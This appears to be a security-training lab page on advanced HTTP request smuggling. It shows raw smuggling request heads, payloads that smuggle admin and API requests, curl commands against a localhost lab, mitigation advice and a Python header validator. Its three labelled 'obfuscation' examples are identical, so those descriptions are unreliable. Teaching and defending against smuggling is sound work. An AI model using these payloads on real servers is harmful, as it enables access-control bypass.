Lab 5: Advanced Bypass Techniques

Complex techniques to bypass modern protections

Difficulty: High

Lab Overview

This lab demonstrates advanced HTTP Request Smuggling techniques used to bypass modern protections and security controls. These techniques include header obfuscation, chunk size manipulation, whitespace manipulation, and other sophisticated bypass methods.

Objective: Use advanced bypass techniques to smuggle requests past modern security protections.

Advanced Bypass Techniques
// Advanced Bypass Techniques

// 1. Header Obfuscation
POST /5.php HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Content-Length: 3

0

SMUGGLED

// 2. Chunk Size Manipulation
POST /5.php HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Content-Length: 3

0

SMUGGLED

// 3. Whitespace Manipulation
POST /5.php HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Content-Length: 3

0

SMUGGLED

// 4. Multiple Transfer-Encoding Headers
POST /5.php HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Transfer-Encoding: identity
Content-Length: 3

0

SMUGGLED
Vulnerability Details
  • Type: HTTP Request Smuggling (Advanced Bypass)
  • Severity: Critical
  • Method: POST
  • Issue: Advanced bypass techniques for modern protections
Test Payloads

Try these payloads in the request body:

  • 0\r\n\r\nSMUGGLED - Basic bypass
  • 0\r\n\r\nGET /admin HTTP/1.1\r\nHost: example.com\r\n\r\n - Admin access
  • 0\r\n\r\nPOST /api/users HTTP/1.1\r\nHost: example.com\r\nContent-Length: 10\r\n\r\nuser=admin - API access
Manual Testing with curl

Use these curl commands to test the vulnerability:

# Basic bypass
curl -X POST http://localhost/test/http_rs/5.php \
  -H "Transfer-Encoding: chunked" \
  -H "Content-Length: 3" \
  -d "0 SMUGGLED"

# Header obfuscation
curl -X POST http://localhost/test/http_rs/5.php \
  -H "Transfer-Encoding: chunked" \
  -H "Content-Length: 3" \
  -d "0 SMUGGLED"

# Multiple Transfer-Encoding headers
curl -X POST http://localhost/test/http_rs/5.php \
  -H "Transfer-Encoding: chunked" \
  -H "Transfer-Encoding: identity" \
  -H "Content-Length: 3" \
  -d "0 SMUGGLED"
Real-World Attack Scenarios
Mitigation Strategies
  • Ensure consistent parsing between frontend and backend servers
  • Implement strict header validation and sanitization
  • Use reverse proxies that handle parsing consistently
  • Implement request validation and sanitization
  • Perform regular security testing and vulnerability assessments
  • Monitor for unusual request patterns and anomalies
  • Keep security controls updated and patched
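
The strict header validation listed above can be enforced at the front end before a request is forwarded. The Python check below is an added example, not code from this lab: the function name framing_violations and the sample byte strings are constructed, and rejecting every request that carries both Transfer-Encoding and Content-Length is a policy assumption that is stricter than some servers apply.

```python
import re

# Header field names must consist of RFC 9110 "token" characters only.
TOKEN = re.compile(rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")

def framing_violations(head: bytes) -> list:
    """Return reasons to reject a raw request head (request line + headers)."""
    problems, te, cl = [], [], []
    for line in head.split(b"\r\n")[1:]:
        if not line:
            break                                    # blank line ends the headers
        if line[:1] in (b" ", b"\t"):
            problems.append("obsolete line folding")
            continue
        name, sep, value = line.partition(b":")
        if not sep or not TOKEN.fullmatch(name):
            problems.append("malformed header name")  # e.g. space before ':'
            continue
        if any(c in value for c in (b"\r", b"\n", b"\x00")):
            problems.append("control character in header value")
        value = value.strip(b" \t").lower()
        if name.lower() == b"transfer-encoding":
            te.append(value)
        elif name.lower() == b"content-length":
            cl.append(value)
    if len(te) > 1:
        problems.append("multiple Transfer-Encoding headers")
    if any(v != b"chunked" for v in te):
        problems.append("Transfer-Encoding is not exactly 'chunked'")
    if te and cl:
        problems.append("both Transfer-Encoding and Content-Length")
    if len(set(cl)) > 1 or any(not v.isdigit() for v in cl):
        problems.append("invalid or conflicting Content-Length")
    return problems

# Constructed samples mirroring the request heads shown on this page.
CL_TE = (b"POST /5.php HTTP/1.1\r\nHost: example.com\r\n"
         b"Transfer-Encoding: chunked\r\nContent-Length: 3\r\n\r\n")
DOUBLE_TE = (b"POST /5.php HTTP/1.1\r\nHost: example.com\r\n"
             b"Transfer-Encoding: chunked\r\nTransfer-Encoding: identity\r\n"
             b"Content-Length: 3\r\n\r\n")
CLEAN = b"POST /5.php HTTP/1.1\r\nHost: example.com\r\nContent-Length: 3\r\n\r\n"

if __name__ == "__main__":
    for sample in (CL_TE, DOUBLE_TE, CLEAN):
        print(framing_violations(sample) or "accept")
```

A front end that returns 400 and closes the connection whenever this list is non-empty never forwards a request whose body length the backend could read differently.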